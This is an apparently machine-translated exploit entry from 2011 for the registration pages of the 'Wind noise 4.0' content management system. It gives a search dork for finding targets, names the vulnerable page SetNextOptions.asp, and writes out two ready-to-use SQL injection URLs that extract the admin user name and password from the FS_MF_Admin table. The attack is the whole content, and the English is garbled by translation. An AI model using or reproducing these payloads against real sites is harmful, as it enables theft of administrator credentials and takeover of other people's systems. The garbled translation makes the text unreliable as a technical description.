Wind noise 4. 0 registered page exploit-vulnerability warning-the black bar safety net

2011-05-24T00:00:00
ID MYHACK58:62201130593
Type myhack58
Reporter 佚名
Modified 2011-05-24T00:00:00

Description

Keywords: inurl:User/Reg_service. asp

The wind noise the registration page...

Vulnerability page:/user/SetNextOptions. asp

Use method:

Constructor injection

user/SetNextOptions. asp? sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin

“admin_name” admin user name of the database table

user/SetNextOptions. asp? sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin

“admin_pass_word” manage password database table